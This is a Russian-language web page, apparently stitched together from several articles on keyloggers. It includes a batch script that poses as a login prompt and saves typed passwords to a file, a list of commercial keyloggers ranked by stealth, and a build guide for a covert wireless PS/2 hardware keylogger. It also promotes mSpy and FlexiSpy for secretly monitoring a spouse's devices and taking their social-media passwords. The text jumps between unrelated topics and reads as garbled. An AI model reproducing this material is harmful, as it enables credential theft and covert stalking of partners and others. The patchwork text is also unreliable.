Как сделать кейлоггер из флешки

Добавил пользователь Alex
Обновлено: 10.09.2024

В этом материале вы узнаете как создать простой клавиатурный перехватчик, используя стандартный блокнот, который может зарегистрировать каждое нажатие клавиши.

Хакеры используют клавиатурные перехватчики, чтобы украсть конфиденциальные данные.

Клавиатурный шпион – опасный инструмент взламывания, который может работать в фоновом режиме, не позволяя пользователю заметить свое присутствие.

Есть много программного обеспечения кейлоггеров доступное онлайн.

Не используйте его, если оно не с открытым исходным кодом.

Хакеры используют клавиатурные шпионы, чтобы украсть конфиденциальные данные, такие как имена пользователей, пароли, детали банковского счета и информация о кредитной карте.

Давайте посмотрим, как мы можем сделать собственный кейлоггер без дополнительного ПО и знаний программирования.

1. Перейдем в директорию диска ( C: ) и найдем папку Logs. Если она не существует содаем ее.

2. Открываем блокнот и вставляем в него следующее содержимое:

@echo off
color a
title Login
cls
echo Please Enter Your Email Address And Password
echo.
echo.
cd “C:Logs”
set /p user=Username:
set /p pass=Password:
echo Username=”%user%” Password=”%pass%” >> Log.txt
start >>Program Here

3. Переходим в меню и сохраняем файл. Назовем его Logs.bat и сохраним его в каталоге Logs на диске C:

4. Чтобы проверить его работу, запустим батник и введем куда либо пароль и логин.

5. Перейдем в папку Logs и найдем там файл log.txt.

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.

Я запустил файл, но вводить нудно именно туда, а не где попало

Там будут токо логины и пороли сохранятся или все буквы.



Anything in here will be replaced on browsers that support the canvas element

С ростом использования социальных сетей кража учетных данных социальных сетей хакерами стала серьезной проблемой во всем мире. Похищенные учетные данные социальных сетей впоследствии используются для выманивания и кражи денег и других ценных вещей у ничего не подозревающих пользователей социальных сетей, друзей и родственников. В этом руководстве мы расскажем, как хакеры используют инструмент “zphisher”, чтобы получить […]

В последние несколько лет облачные вычисления демонстрируют экспоненциальный рост и массове внедрение. От стартапов и малого бизнеса до предприятий – все используют облачные вычисления в своей деятельности. А такие компании, как Amazon, Google и Microsoft, разрабатывают первоклассные облачные сервисы, чтобы облегчить жизнь другим предприятиям и конечным пользователям, занимая лидирующие позиции в отрасли. Нет необходимости говорить, […]

Особенности выбора SSD диска для геймерского ПК: 3 лучших модели объемом от 2 Тб Способность быстро загружать и записывать файлы на накопитель – одно из главных преимуществ SSD. Они энергоэффективны, выделяются компактными размерами и малым весом, а также высокой прочностью. Установив приложение на SSD накопитель, вы сможете увеличить FPS играх и программах, например в игре […]

Это наш обзор лучшего программного обеспечения AntiTrack, позволяющего стереть ваши цифровые следы. Большинство рекламодателей, в двух словах, – жестокие манипуляторы. Как бы грубо это ни звучало для кого-то, это простая реальность. Реклама постоянно вбивает в ваше подсознание продукты, которые вам редко нужны. Эти продукты уверяют в успехе, заявляют о себе как об умном выборе и […]

Введение в отслеживание IP-адреса с помощью Wireshark Бывают случаи, когда нам необходимо отследить IP-адрес до его происхождения (страна, город, номер AS и т.д.). Особенно, когда мы проводим сетевой анализ форензики, целью которого является обнаружение шаблонов атак и идентификация злоумышленников. С помощью IP-геолокации мы можем определить географическое местоположение IP-адреса. В Интернете существует множество бесплатных, а также […]

Что такое кейлоггер

Какими бывают кейлоггеры

Как распространяются кейлоггеры

  • при открытии файла электронного письма, которое вам прислали незнакомы е ( или знакомые) люди;

  • при посещении сомнительных сайтов, где может быть установлен скрипт, запускающий автоматическую установку кейлоггера на устройство;

  • когда на устройстве уже есть вредоносная программа, которая самостоятельно устанавливает другие программы;

  • при скачивании сомнительных программ или драйверов с сомнительных сайтов;

  • когда незнакомый вам сайт просит обновить какую-то программу, установленную на вашем компьютере;

  • и др.

Кейлоггер: создать или использовать готовый

  • The Rat! — работает на уровне аппаратного ядра, поэтому вообще незаметен для защитных программ;

  • Elite Keylogger — работает на уровне системных драйверов, поэтому также остается очень незаметным, способен перехватывать не только нажатия клавиатуры, но и снимки с веб-камеры;

  • All-in-one Keylogger — работает на уровне системных AppData-директ о рий, поэтому недоступен пользователям для обнаружения, но со временем может быть обнаружен программами безопасности;

  • Spytech SpyAgent — работает на уровне системных файлов, поэтому рано или поздно будет обнаружен антивирусами, но обладает широким функционалом, например , способен перехватывать видео с камеры и звук с микрофона;

  • Spyrix Personal Monitor — многофункциональный кейлоггер со средней скрытностью, может быть использован в частном порядке, когда его обнаружение не критично, например, когда нужно проследить за своими детьми, братьями, сестрами и т. д.

  • и др.

Как создать свой собственный кейлоггер

Заключение

Перед тем как создать или использовать кейлоггер, нужно понимать, для каких целей вы хотите осуществить слежку. Такие действия относятся к социальной инженерии и являются незаконными во многих государствах. Поэтому за незаконную слежку за кем бы то н и было вас могут привлечь к ответственности. При этом сами программы-кейлоггеры являются законным и легальным программным обеспечением.

Мы будем очень благодарны

если под понравившемся материалом Вы нажмёте одну из кнопок социальных сетей и поделитесь с друзьями.

Аппаратный кейлоггер является отличным решением для мониторинга пользовательской активности и в отличие от программного кейлоггера, у него минимальный риск обнаружения.
Аппаратный кейлоггер - это чисто электронное устройство, которое не требует установки какого-либо дополнительного программного обеспечения, вмешательства в ОС, драйверы и т.п. Однако, у большинства аппаратных кейлоггеров есть один недостаток - периодически требуется физический доступ к компьютеру для переброса информации с памяти кейлоггера. Но есть очень хорошее решение: радио кейлоггер (Wireless Keylogger).

Радио (или беспроводной) кейлоггер состоит из двух основных модулей: передатчика и приемника. Сам модуль кейлоггера находится в передатчике, который является PS/2 аппаратным кейлоггером с встроенным радиопередающим модулем 2.4 ГГц. Т.о. все нажатия клавиш клавиатуры передаются в реальном времени через радиоканал. Приемник находится в другом месте и подключен через USB. Далее, на стороне ПО через виртуальный COM-порт, принятые данные можно отобразить в любом терминале.

Вся система работает в режиме реального времени, т.е. текст, который набирается на клавиатуре с передатчиком, сразу же виден на приемной стороне. Максимальный радиус действия составляет около 50 метров. В здании с 3-4 стенами радиус действия составляет около 20 метров (зависит от толщины стен).

И передатчик и приемник, имеют одинаковую принципиальную схему и соответственно топологию печатной платы. Оба имеют однотипный форм-фактор и сделаны под PS/2 и USB удлинители с т.н. балуном (ферритовое кольцо - фильтр).

Компоненты

Чтобы собрать данный кейлоггер вам понадобятся базовые знание электроники и умение пайки SMD-компонентов.

В таблице ниже, приведен список требуемых радиоэлементов для приемника или передатчика (разницы нет, т.к. все одинаковое кроме кабеля и прошивки).

Основными компонентами здесь является микроконтроллер AT91SAM7S64 фирмы Atmel и радиомодуль nRF2401. Для обеих м/с нужны соответствующие кварцевые резонаторы. Кроме стабилизатора напряжения MCP1700 все остальные компоненты пассивные (резисторы, конденсаторы и пара индуктивностей). Обычный провод используется в качестве дипольной антенны. На картинках ниже приведена двухсторонняя плата.

Ниже представлены маски для изготовления печатной платы. В оригинальном устройстве используется стеклотекстолит FR4 толщиной 1мм.

Ниже, в данной статье вы найдете PDF-файлы плат и масок для их изготовления.

Сборка

Вся схема питается от 3.3В, которые выдает стабилизатор напряжения MCP1700. Питание берется напрямую от шины PS/2 (если передатчик) или от USB (в случае приемника).

Для пайки компонентов используйте соответствующие паяльник и флюс. Не допускайте перегрева компонентов. Сначала припаяйте радиомодуль nRF2401, это наиболее сложный компонент. Затем, микроконтроллер AT91SAM7S64 и стабилизатор MCP1700. В самом конце припаяйте резисторы, конденсаторы, кварцы и индуктивности. В качестве антенны можно использовать ISM 2.4 ГГц антенну, либо сделать простую четверть волновую дипольную антенну из кусочка провода. Оптимальная длина - 3.125 см. Собранные платы показаны на фото ниже.

После того, как все собрано, осталось разобраться с кабелями. Как уже отмечалось выше, они разные для передатчика и приемника. Плата передатчика подсоединяется в разрыв кабеля. Плата приемника, цепляется к USB как обычно. На рисунках ниже показано присоединение.

Кабели разрежьте и подсоедините согласно вышеприведенным рисункам. Для вызванивания контактов воспользуйтесь тестером.

Распиновка PS/2

Сигнал Описание PS/2 pin Комментарий
VCC +5В питание 4 Должны быть подсоединены к модулю
GND Земля питания 3
CLK Clock 5
DATA Data 1
NC Не использ. 2, 6 Не используется
SHLD Экран -

Распиновка USB

Сигнал Описание USB pin Комментарий
VCC +5В питание 1 Должны быть подсоединены к модулю
D- Data 2
D+ Data 3
GND Земля питания 4
SHLD Экран - Не используется

Микроконтроллер прошивается при помощи ISP (внутрисхемное программирование) Об этом чуть ниже.

После того как все собрано, на всякий случай прозвоните цепь питания (между VCC и GND) на предмет наличия КЗ. Иначе можете спалить порт в компьютере. Если все нормально, то можно уложить платы в корпуса и склеить сам корпус.

Прошивка контроллера

Микроконтроллер AT91SAM7S64 прошивается при помощи технологии ISP (внутрисхемное программирование). Технология ISP позволяет прошить микроконтроллер после его припаивания на плату. Т.к. МК AT91SAM7S64 содержит встроенный USB-контроллер, то прошивка контроллера незатейливый процесс и здесь используется технология SAM-BA (SAM Boot Assistant). Требуется USB-кабель и несколько джамперов. Для прошивки необходимо скачать AT91 ISP, а затем следуя нижеследующей пошаговой инструкции прошить микроконтроллер.

Шаг 1. Применительно только к передатчику, данный шаг для приемника не требуется, т.к. он уже подключен к USB. Подготовьте кабель USB type A папа на одном конце и с зачищенными проводками на другом конце. Припаяйте выводы кабеля VCC, GND, D+, и D- к соответствующим местам на печатной плате.

Шаг 2. Подготовьте несколько перемычек, для того, чтобы замкнуть все SAM-BA выводы: TST, ERASE, PA2, PA1, PA0, 3.3V. Соедините вместе все выводы при помощи перемычек или джамперов.

Шаг 3. Установите ПО AT91 ISP

Шаг 5. На пару секунд соедините между собой выводы ERASE и 3.3V. Это сотрет флэш память микроконтроллера.

Шаг 6. Отсоедините устройство от USB-порта компьютера и снимите перемычки. Теперь, соедините между собой все выводы: PA0, PA1, PA2, TST и 3.3V. Снова подсоедините устройство к USB ПК, выждите около 10 секунд и отсоедините его. Эта операция активирует SAM-BA bootloader.

Шаг 7. Уберите все перемычки и подсоедините устройство к USB. Windows обнаружит новое устройство и предложит стандартную процедуру установки драйверов.

Шаг 8. Откройте диспетчер устройств и удостоверьтесь, что SAM-BA bootloader активирован.

Шаг 9. Запустите приложение SAM-BA (ПО AT91 ISP) и выберите тип МК: AT91SAM7S64-EK.

Шаг 10. После установки соединения с МК, перейдите в вкладу Flash, выберите подходящий файл прошивки (для передатчика или приемника) и нажмите Send File. Когда ПО спросит "lock and unlock the involved flash regions" нажмите yes. После этого микроконтроллер прошьется и устройства готовы к работе.

Подключение и тестирование кейлоггера

Настало время тестирования нашего устройства. Мы рекомендуем для тестов использовать один компьютер. Выключите компьютер и между портом компьютера PS/2 и клавиатурой подключите модуль передатчика.

Включите компьютер и проверьте работу клавиатуры, модуль не должен никоим образом на нее влиять.

После этого необходимо протестировать приемник, но сначала скачайте соответствующие драйвера (см. ниже). Подключите приемник в свободный USB-порт, система обнаружит устройство и предложит установить драйвера.

Драйвера представляют из себя виртуальный COM-порт (USB to serial converter) и вешаются на любой свободный COM-порт вашего компьютера.

Для того, чтобы принимать данные с передатчика кейлоггера удобнее всего пользоваться терминальным клиентом, к примеру Hyperterminal. Мы рекомендуем для этой цели воспользоваться программой Simple Serial Monitor.

После запуска программы, выберите COM-порт к которому у вас привязан ваш приемник. Если все правильно работает, то в терминале вы должны сразу же видеть символы, которые набираются на клавиатуре с кейлоггером.

Следующим этапом тестирования будет использование двух разных компьютеров. При этом, учитывайте радиус действия!

Вы знаете, что за кейлоггер является? Это программное обеспечение для мониторинга, предназначенное для запись нажатия клавиш сделано пользователем. Когда кто-то ведет кейлог для устройств других людей, он может получать каждое нажатие клавиши пользователя устройства и использовать эту информацию для взлома учетной записи.

Его можно удаленно установить на компьютер и связать целевое устройство без ведома владельца целевого устройства. Удаленную установку кейлоггера для последующей настройки на целевом устройстве можно выполнить на веб-сайт шпионского ПО который предлагает скачать для использования программы.

Установите Keylogger удаленно и Keylog Someone Poster

Кейлоггинг кем-то; Почему

В настоящее время это своего рода шпионских программ разработан, чтобы позволить человеку контролировать другое устройство для таких целей, как;

По какой-то причине люди используют кейлоггер, потому что он дает им преимущества тайного мониторинга целевого устройства и получения к нему полного доступа.

[Получение правильного продукта] Используйте mSpy для Keylog мобильных устройств

Если вы ищете программу с множеством функций для мониторинга чьего-либо гаджета и с кейлоггер удаленной установки, mSpy одна из самых популярных программ. Эта программа - один из самых эффективных инструментов шпионажа, который отслеживает все действия, происходящие на целевом телефоне.

Работы С Нами mSpy кейлоггер, поможет вам следить за тем, что целевые пользователи вводят на своем устройстве, и будет фиксировать каждый нажатие клавиши на их устройстве. Если они его напечатают, вы это увидите. В этом сила mSpy, одного из лучших клавиатурных шпионов устройств, независимо от того, является ли целевым устройством компьютер, Android или iPhone.

Шаги по использованию MSPY

  1. Шаг 1. Перейдите на официальную веб-страницу MSPY. Завести аккаунт.

Зарегистрируйтесь на MSPY

  1. Выберите тарифный план, который вы можете использовать и который работает с вашим устройством.
  1. После создания учетной записи mSpy отправит следующую информацию; Ссылка для скачивания, руководство по установке, регистрационный код, имя пользователя и пароль, а также адрес. Просто следуйте инструкциям в электронном письме.

Настроить MSPY

Установить mSpy, вам нужно знать целевое устройство. Независимо от того, является ли целевое устройство компьютером, Android или iOS. Следуйте инструкциям по настройке MSPY.

mSpy Выберите тип устройства

Настроить для Android

Включить « Неизвестный источник "Вариант первым на Настройки вариант на целевом Android. Чтобы разрешить установку приложения.

Скопируйте ссылку для скачивания, присланную mSpy из вашей электронной почты. Затем вставьте в браузер, чтобы открыть веб-страницу для загрузки приложения.

Настроить для IOS

Презентация mSpy и перейдите на панель инструментов, чтобы щелкнуть значок « Настроить новый телефон "И выберите" iPhone Категория.

Затем введите код на панели инструментов mSpy.

Функция mSpy Keylogger - как использовать

После настройки mSpy на целевом устройстве вы можете взломать устройство и отслеживать пароль пользователя целевого устройства социальные медиа-счета.

Для использования mSpy кейлоггер выполните следующие действия.

Кейлоггеры отслеживания mSpy

  1. Войдите на свой учетная запись mSpy, перейдя по ссылке, отправленной на вашу электронную почту, для доступа к панели управления mSpy.
  2. Введите учетные данные для входа, которые также будут отправлены на вашу электронную почту.
  3. Перейдите в Панель управления mSpyи проверьте " Keylogger "возможность выбрать приложение, к которому вы хотите получить доступ.
  4. Проверьте историю активности клавиатуры вашей цели. Прокрутите вниз, чтобы найти пароли на платформах пользователя в социальных сетях.
  5. Затем используйте пароль для входа в учетную запись пользователя.

Другие особенности mSpy

Общая функция mSpy

Особенности локаций - Он содержит две функции для мониторинга местоположения.

  1. Расположение GPS - Вы можете отслеживать текущее местоположение пользователя целевого устройства. Вы можете увидеть текущее и прошлое местоположение пользователя, записанное на подробной мини-карте.

mSpy Проверить местоположение

  1. Geo Fencing - Он ограничивает и отмечает безопасные зоны на миникарте для наблюдения за целевым устройством. Он подаст сигнал, если целевое устройство войдет в отмеченные безопасные и ограниченные зоны.

mSpy Geo Fence

Социальная сеть mSpy

Screen Recorder - Здесь вы можете просмотреть действия, зафиксированные монитором целевого устройства. Вы будете видеть, какие действия выполняет пользователь целевого устройства каждый раз, когда он / она использует целевое устройство.

Функция записи экрана mSpy

Использование Интернета - С помощью этой функции вы можете контролировать доступ в Интернет, например историю браузера, закладку браузера и электронную почту. С его помощью вы можете отслеживать все посещенные страницы и личные электронные письма пользователя целевого устройства.

Функция использования Интернета mSpy

Ограниченная функция - Эта функция ограничивает и блокирует доступ пользователя к определенным сетям Wi-Fi, посещенным веб-сайтам, а также блокирует установленные пользователем приложения. Это приложение будет ограничивать доступ целевого пользователя устройства к заблокированным веб-сайтам.

Ограниченная функция mSpy

С этими особенностями mSpy. Вы можете видеть, что с помощью этого инструмента вы можете полностью контролировать целевое устройство во всех действиях и определять его местоположение в любое время и в любом месте.

Установите кейлоггеры на компьютеры через FlexiSpy

Также важно проверить чей-то компьютер, мы никогда не сможем сказать, чем он занят. Как я уже упоминал выше, опасность интернет просто прячутся за углом. Полно сексуальные хищники ждут своей следующей цели, и будем надеяться, что это не ваш ребенок. Поэтому пока еще рано, клавиатурных компьютеры вашего ребенка просто необходимы.

Когда дело доходит до неверности, ваш неверный супруг может знать, что вы планируете взломать его / ее телефон, но они не знают, что вы на шаг впереди. В кейлоггер удаленной установки - одно из решений, позволяющих поймать вашего изменяющего супруга с поличным.

Теперь, чтобы успешно ввести кого-либо в кейлог на его персональных компьютерах, вам понадобится программа, которая может успешно обойти компьютер без каких-либо проблем.

Flexispy это один из наших рекомендуемых инструментов, когда дело доходит до клавиатурных. Эта программа не только поможет вам вести кейлог и обойти любой компьютер, но также эффективно работает на мобильных устройствах.

Помимо кейлоггинга, FlexiSpy содержит множество удивительных функций, таких как прослушивание в реальном времени, доступ к сетевой активности, мониторинг приложений, интернет-активность и многое другое. Эти функции, несомненно, помогут вам контролировать свою цель на другом уровне. Одна хорошая вещь в FlexiSpy заключается в том, что он работает незаметно в фоновом режиме, так что ваша цель не будет знать, что за ней наблюдают.

С FlexiSpy вы можете быть уверены, что ваши дети в безопасности, независимо от того, используют ли они свои мобильные устройства или ПК. А когда дело доходит до поимки супруга, ну Flexispy протянет вам руку и поможет раскрыть грязную правду. И так, чего же ты ждешь? Установите FlexiSpy прямо сейчас!

Как установить Flexispy на ПК

Кейлоггер Flexispy for PC - один из немногих невидимых клавиатурных шпионов, который предлагает поддержку удаленной установки, обеспечивая быструю и незаметную установку.

    Создайте учетную запись - перейдите в Flexispy официальная веб-страница и нажмите, чтобы зарегистрироваться.

FlexiSPY Войти на портал

Вы можете установить программу, скачав .exe файл который доступен на панели управления.

Вы также можете загрузить приложение в облако, например Dropbox и Google Drive и щелкните ссылку, когда целевой компьютер используется.

Или используйте USB диск и установите его на целевой компьютер. Скопируйте ссылку, отправленную на вашу электронную почту, и сохраните ее на USB-накопителе.

Заключение

После обзора продукта все, что я могу сказать, это то, что mSpy универсален, когда дело доходит до слежки за устройством. Если вы хотите использовать кейлоггер на чьем-то ПК, Флексиспай это самый эффективный инструмент для кейлоггеров и очень простой в использовании. Я настоятельно рекомендую mSpy и Flexispy особенно родителям и людям, которые сомневались в своих партнерах в совершении неверных действий. Попробуйте и убедитесь сами, насколько хороши эти два приложения.

Часто задаваемые вопросы

Единственный способ получить кейлоггер на компьютер, если у вас нет доступа к нему, через сеть или прямую линию к нему через Интернет с помощью программного обеспечения для удаленного управления.

  • Прикрепите его как электронное письмо и отправьте. Вы можете прикрепить программу так же, как и любое другое вложение электронной почты.

Разве незаконно ставить кейлоггер на чей-то компьютер?

A Keylogger может быть незаконным, если вы используете его в преступных целях, например для кражи личных данных и финансовой информации. Также незаконно, если вы устанавливаете вредоносное ПО на компьютер человека без его ведома.

Читайте также: